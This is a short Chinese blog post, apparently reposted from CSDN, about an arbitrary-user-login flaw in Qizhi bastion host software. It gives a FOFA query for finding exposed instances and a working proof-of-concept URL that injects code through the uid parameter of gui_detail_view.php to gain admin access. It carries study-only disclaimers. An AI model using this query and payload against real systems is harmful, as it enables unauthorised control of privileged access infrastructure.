其他分享
首页 > 其他分享> > 齐治堡垒机任意用户登录漏洞

齐治堡垒机任意用户登录漏洞

作者:互联网

2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力!
由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。
工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。

漏洞说明

浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司,齐治运维堡垒机服务端存在任意用户登录系统漏洞,访问特定的Url即可获得后台权限。

fofa查询语法

app=“齐治科技-堡垒机”

漏洞复现

漏洞POC为

http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

在这里插入图片描述
在这里插入图片描述

标签:网络安全,2bchr,齐治,xxx,漏洞,堡垒
来源: https://blog.csdn.net/maverickpig/article/details/122650262